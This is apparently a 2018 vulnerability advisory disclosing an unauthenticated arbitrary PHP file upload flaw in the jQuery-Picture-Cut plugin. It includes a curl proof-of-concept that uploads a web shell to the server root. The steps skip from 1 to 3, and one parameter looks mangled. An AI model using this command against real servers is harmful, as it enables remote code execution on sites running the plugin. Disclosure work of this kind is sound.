Larry W. Cashdollar
2018-11-20 22:05:41 UTC
Author: Larry W. Cashdollar, @_larry0
CWE: CWE-434 arbitrary file upload
Download Site: https://github.com/TuyoshiVinicius/jQuery-Picture-Cut
Vendor Notified: 2018-11-03
Vendor Contact: ***@hotmail.com
Description: picture cut is a jquery plugin that handles images in a very friendly and simple way, with a beautiful interface based on bootstrap or jquery ui, has great features like ajax upload, drag image from explorer, image crop and others.
The code in jQuery-Picture-Cut/src/php/upload.php that calls ../core/PictureCut.php to handle the file upload does not check file type and allows the user to choose the file location path. An unauthenticated user and upload an executable PHP file to the server allowing code execution.
1. curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "firstname.lastname@example.org" http://example.com/jQuery-Picture-Cut/src/php/upload.php
3. With folderOnServer=/ the shell will be in the main web directory path.